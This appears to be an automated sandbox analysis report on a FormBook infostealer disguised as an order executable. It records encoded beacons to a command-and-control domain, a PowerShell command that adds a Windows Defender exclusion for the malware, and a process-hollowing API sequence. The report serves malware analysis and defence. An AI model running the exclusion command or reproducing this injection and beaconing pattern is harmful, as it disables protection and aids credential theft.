                                                      Data Ascii: OdjTHtuX=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVK/UP80XE5CcuamxcbhxWC10KW1tvt0ZlN9cEaBEFDGJhhJFzbHWrikLpwbOwTLXQT6ZDTbMoZpMqQgSe8Gm7bx8q/IQBLnq41lrs20PwoUkgKfi3mthKsuHiIBG9YOFXy6JJCF815OsLpI3pUvW4X94GPKdeOx2d3bySu+zQMHCh6/PFFt1wBk0JdL1IHvhVpK4KBm1CeJrwbT4uWNbmGKBY5kYGmrV73pKZj6IDus3UvX98MFEQGANmewyh9Hp/DFOEX/JaTa+D3j9z52Y/4XhWrQw1njmK5X8gIaSI7FihWn4amRYyOeLQsLmCeeLgWj7GBuFgeAr4CQ+OE3BW4yO892REAalMg7An16aEFSkpbmxv7w3qntgYhoqR7oZihZqZYI2JX6FI7WptdOhZTP3ai065d7EVZprK6zlFhCVtwZf5XZ/N+z/poOH6ajeAFfo94NTWWtW5JgX4QdGoMBrJd/SFcOst3K1OvvzPBCVRCPtroSs99UevoHhOZa2A16wAH9UXJnTyWREmo4NCA5UcHnXuWEPVyV4h6AUFEmyIXJZ6SI16ddtuts4/6Q/SBBjoRFY0NVq1dleKfKTtM9TfYyUSMdahW9gDTNFL5+vH+6CJ/AEoa7Mk6UCME53uW31zsCbCrNjGN9NT5D7V+bs1vKei8jb5UyIcDidiravcmsULyVofpKrWLGuCEFyMwg9s7H9FK5Yz9zx4D+CEumFGaLhOY6jpHsWHwBjucinwGGDN1OS4KYKZcH0nu5zMaDzY2+nKiEFN+AxxHClLT3G7daXcdikp0RDpLRWmY24dJAup3RUcAfUyMcBUcGVjWtd5hYMET3wlvCAM/w4MSAwTdhDqDOO2RwjYtotH67QYO8w9LEFIFp61T0aioOw1eriOnAJGqTICnrTa84Ax4tUNZixZo2xeYfhXodQcZvefSEym0UBNawKRBzN9EmaYAk [TRUNCATED]
                                                      Jul 3, 2024 17:59:44.008351088 CEST305INHTTP/1.1 405 Not Allowed
                                                      date: Wed, 03 Jul 2024 15:59:43 GMT
                                                      content-type: text/html
                                                      content-length: 154
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.64977864.190.62.22806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:59:46.190094948 CEST352OUTGET /pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.hondamechanic.today
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:46.854329109 CEST1236INHTTP/1.1 200 OK
                                                      date: Wed, 03 Jul 2024 15:59:46 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      transfer-encoding: chunked
                                                      vary: Accept-Encoding
                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      pragma: no-cache
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_qqoVxQILHhM7vqTTla2NnDlvZLgsILjKymGnl3FyiYZSz0lW8IaT/+FBNxXOsdHtvZOpNznJpvFDo8KPDJd1CA==
                                                      last-modified: Wed, 03 Jul 2024 15:59:46 GMT
                                                      x-cache-miss-from: parking-64f5d45c5c-jgr6h
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 71 71 6f 56 78 51 49 4c 48 68 4d 37 76 71 54 54 6c 61 32 4e 6e 44 6c 76 5a 4c 67 73 49 4c 6a 4b 79 6d 47 6e 6c 33 46 79 69 59 5a 53 7a 30 6c 57 38 49 61 54 2f 2b 46 42 4e 78 58 4f 73 64 48 74 76 5a 4f 70 4e 7a 6e 4a 70 76 46 44 6f 38 4b 50 44 4a 64 31 43 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 68 6f 6e 64 61 6d 65 63 68 61 6e 69 63 2e 74 6f 64 61 79 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b [TRUNCATED]
                                                      Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_qqoVxQILHhM7vqTTla2NnDlvZLgsILjKymGnl3FyiYZSz0lW8IaT/+FBNxXOsdHtvZOpNznJpvFDo8KPDJd1CA==><head><meta charset="utf-8"><title>hondamechanic.today&nbsp;-&nbsp;hondamechanic Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="hondamechanic.today is your first and best source for all of the
                                                      Jul 3, 2024 17:59:46.854351044 CEST224INData Raw: 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65
                                                      Data Ascii: information youre looking for. From general topics to more of what you would expect to find here, hondamechanic.today has it all. We hope you find what 576you are searching for!"><link rel="icon" type
                                                      Jul 3, 2024 17:59:46.854362011 CEST1236INData Raw: 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e
                                                      Data Ascii: ="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adj
                                                      Jul 3, 2024 17:59:46.854484081 CEST1236INData Raw: 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74
                                                      Data Ascii: isible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkitAEC-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-in
                                                      Jul 3, 2024 17:59:46.854496002 CEST448INData Raw: 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c
                                                      Data Ascii: 48484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.c
                                                      Jul 3, 2024 17:59:46.854681969 CEST1236INData Raw: 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78
                                                      Data Ascii: one}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.conta
                                                      Jul 3, 2024 17:59:46.854697943 CEST1236INData Raw: 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64
                                                      Data Ascii: :fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-mes
                                                      Jul 3, 2024 17:59:46.854890108 CEST448INData Raw: 3a 63 6f 6c 6c 61 70 73 65 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f
                                                      Data Ascii: :collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius
                                                      Jul 3, 2024 17:59:46.854912043 CEST1236INData Raw: 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d
                                                      Data Ascii: :hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;
                                                      Jul 3, 2024 17:59:46.854927063 CEST224INData Raw: 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61
                                                      Data Ascii: -shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#273948;font-family:Arial,Helvetica,Verdana,"Luc
                                                      Jul 3, 2024 17:59:46.859322071 CEST1236INData Raw: 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                      Data Ascii: ida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;570padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relative;height:1


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:11:55:41
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x310000
                                                      File size:990'720 bytes
                                                      MD5 hash:7C33FB31E0B8302EBA116A02E649200B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x7d0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:11:55:42
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
                                                      Imagebase:0x7d0000
                                                      File size:990'720 bytes
                                                      MD5 hash:7C33FB31E0B8302EBA116A02E649200B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:11:56:14
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe"
                                                      Imagebase:0x640000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:10
                                                      Start time:11:56:16
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\compact.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                      Imagebase:0xc0000
                                                      File size:41'472 bytes
                                                      MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:13
                                                      Start time:11:56:29
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe"
                                                      Imagebase:0x640000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:14
                                                      Start time:11:56:40
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff728280000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:8.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:218
                                                        Total number of Limit Nodes:13
                                                        execution_graph 25922 47c4878 25923 47c4a03 25922->25923 25925 47c489e 25922->25925 25925->25923 25926 47c2c7c 25925->25926 25927 47c4af8 PostMessageW 25926->25927 25928 47c4b64 25927->25928 25928->25925 26038 a7d680 DuplicateHandle 26039 a7d716 26038->26039 26040 a7ff40 26041 a75cec LoadLibraryExW 26040->26041 26042 a7ff6e 26041->26042 26043 47c2695 26044 47c269d 26043->26044 26045 47c2639 26043->26045 26046 47c2634 26045->26046 26049 47c3660 12 API calls 26045->26049 26050 47c3650 12 API calls 26045->26050 26051 47c3650 26046->26051 26068 47c3660 26046->26068 26049->26046 26050->26046 26052 47c365c 26051->26052 26085 47c3f1c 26052->26085 26090 47c4302 26052->26090 26095 47c3dc1 26052->26095 26101 47c41a0 26052->26101 26105 47c3f87 26052->26105 26109 47c3c86 26052->26109 26114 47c404b 26052->26114 26119 47c3ce8 26052->26119 26124 47c3cce 26052->26124 26129 47c40ed 26052->26129 26134 47c3d13 26052->26134 26139 47c3ab5 26052->26139 26144 47c3b3b 26052->26144 26150 47c413a 26052->26150 26053 47c369e 26053->26046 26069 47c367a 26068->26069 26071 47c3f1c 2 API calls 26069->26071 26072 47c413a 2 API calls 26069->26072 26073 47c3b3b 2 API calls 26069->26073 26074 47c3ab5 2 API calls 26069->26074 26075 47c3d13 2 API calls 26069->26075 26076 47c40ed 2 API calls 26069->26076 26077 47c3cce 2 API calls 26069->26077 26078 47c3ce8 2 API calls 26069->26078 26079 47c404b 2 API calls 26069->26079 26080 47c3c86 2 API calls 26069->26080 26081 47c3f87 2 API calls 26069->26081 26082 47c41a0 2 API calls 26069->26082 26083 47c3dc1 2 API calls 26069->26083 26084 47c4302 2 API calls 26069->26084 26070 47c369e 26070->26046 26071->26070 26072->26070 26073->26070 26074->26070 26075->26070 26076->26070 26077->26070 26078->26070 26079->26070 26080->26070 26081->26070 26082->26070 26083->26070 26084->26070 26086 47c3f22 26085->26086 26087 47c430f 26086->26087 26154 47c1c08 26086->26154 26158 47c1c01 26086->26158 26091 47c430f 26090->26091 26092 47c3f33 26090->26092 26092->26090 26093 47c1c08 WriteProcessMemory 26092->26093 26094 47c1c01 WriteProcessMemory 26092->26094 26093->26092 26094->26092 26096 47c3d12 26095->26096 26097 47c43f3 26096->26097 26162 47c19b8 26096->26162 26167 47c19c0 26096->26167 26097->26053 26098 47c3f03 26098->26053 26171 47c1a68 26101->26171 26175 47c1a70 26101->26175 26102 47c41ba 26102->26053 26107 47c1c08 WriteProcessMemory 26105->26107 26108 47c1c01 WriteProcessMemory 26105->26108 26106 47c3fb5 26107->26106 26108->26106 26110 47c3c8c 26109->26110 26179 47c1cf8 26110->26179 26183 47c1cf1 26110->26183 26111 47c3caf 26115 47c4054 26114->26115 26117 47c1a68 Wow64SetThreadContext 26115->26117 26118 47c1a70 Wow64SetThreadContext 26115->26118 26116 47c4071 26117->26116 26118->26116 26120 47c4056 26119->26120 26122 47c1a68 Wow64SetThreadContext 26120->26122 26123 47c1a70 Wow64SetThreadContext 26120->26123 26121 47c4071 26122->26121 26123->26121 26125 47c4107 26124->26125 26187 47c1b40 26125->26187 26191 47c1b48 26125->26191 26126 47c4125 26130 47c4107 26129->26130 26132 47c1b48 VirtualAllocEx 26130->26132 26133 47c1b40 VirtualAllocEx 26130->26133 26131 47c4125 26132->26131 26133->26131 26135 47c3d2b 26134->26135 26137 47c19b8 ResumeThread 26135->26137 26138 47c19c0 ResumeThread 26135->26138 26136 47c3f03 26136->26053 26137->26136 26138->26136 26140 47c3ad9 26139->26140 26195 47c1e85 26140->26195 26199 47c1e90 26140->26199 26147 47c3ac4 26144->26147 26145 47c4674 26145->26053 26146 47c3bcd 26146->26053 26147->26145 26148 47c1e85 CreateProcessA 26147->26148 26149 47c1e90 CreateProcessA 26147->26149 26148->26146 26149->26146 26152 47c1c08 WriteProcessMemory 26150->26152 26153 47c1c01 WriteProcessMemory 26150->26153 26151 47c415e 26152->26151 26153->26151 26155 47c1c50 WriteProcessMemory 26154->26155 26157 47c1ca7 26155->26157 26157->26086 26159 47c1c04 WriteProcessMemory 26158->26159 26161 47c1ca7 26159->26161 26161->26086 26163 47c19bc 26162->26163 26164 47c1a0a ResumeThread 26163->26164 26165 47c1a39 26163->26165 26166 47c1a31 26164->26166 26165->26098 26168 47c1a00 ResumeThread 26167->26168 26170 47c1a31 26168->26170 26172 47c1a6c Wow64SetThreadContext 26171->26172 26174 47c1afd 26172->26174 26174->26102 26176 47c1a74 Wow64SetThreadContext 26175->26176 26178 47c1afd 26176->26178 26178->26102 26180 47c1cfc ReadProcessMemory 26179->26180 26182 47c1d87 26180->26182 26182->26111 26184 47c1cf4 ReadProcessMemory 26183->26184 26186 47c1d87 26184->26186 26186->26111 26188 47c1b44 VirtualAllocEx 26187->26188 26190 47c1bc5 26188->26190 26190->26126 26192 47c1b88 VirtualAllocEx 26191->26192 26194 47c1bc5 26192->26194 26194->26126 26196 47c1e88 CreateProcessA 26195->26196 26198 47c20db 26196->26198 26198->26198 26200 47c1f19 CreateProcessA 26199->26200 26202 47c20db 26200->26202 26202->26202 25929 a74668 25930 a7467a 25929->25930 25931 a74686 25930->25931 25935 a74783 25930->25935 25940 a74218 25931->25940 25933 a746a5 25936 a7479d 25935->25936 25944 a74884 25936->25944 25948 a74888 25936->25948 25941 a74223 25940->25941 25956 a75c6c 25941->25956 25943 a77048 25943->25933 25945 a748af 25944->25945 25947 a7498c 25945->25947 25952 a744e0 25945->25952 25949 a748af 25948->25949 25950 a7498c 25949->25950 25951 a744e0 CreateActCtxA 25949->25951 25951->25950 25953 a75918 CreateActCtxA 25952->25953 25955 a759db 25953->25955 25957 a75c77 25956->25957 25960 a75c8c 25957->25960 25959 a770ed 25959->25943 25961 a75c97 25960->25961 25964 a75cbc 25961->25964 25963 a771c2 25963->25959 25965 a75cc7 25964->25965 25968 a75cec 25965->25968 25967 a772c5 25967->25963 25969 a75cf7 25968->25969 25971 a785cb 25969->25971 25974 a7ac84 25969->25974 25970 a78609 25970->25967 25971->25970 25978 a7cd6b 25971->25978 25984 a7acb0 25974->25984 25987 a7aca8 25974->25987 25975 a7ac8e 25975->25971 25979 a7cd91 25978->25979 25980 a7cdb5 25979->25980 26008 a7cf20 25979->26008 26012 a7cedd 25979->26012 26016 a7cf10 25979->26016 25980->25970 25991 a7ada8 25984->25991 25985 a7acbf 25985->25975 25988 a7acb0 25987->25988 25990 a7ada8 LoadLibraryExW 25988->25990 25989 a7acbf 25989->25975 25990->25989 25992 a7adb9 25991->25992 25993 a7add4 25991->25993 25992->25993 25996 a7b040 25992->25996 26000 a7b03e 25992->26000 25993->25985 25997 a7b054 25996->25997 25998 a7b079 25997->25998 26004 a7a168 25997->26004 25998->25993 26001 a7b054 26000->26001 26002 a7b079 26001->26002 26003 a7a168 LoadLibraryExW 26001->26003 26002->25993 26003->26002 26005 a7b220 LoadLibraryExW 26004->26005 26007 a7b299 26005->26007 26007->25998 26009 a7cf2d 26008->26009 26011 a7cf67 26009->26011 26020 a7b780 26009->26020 26011->25980 26013 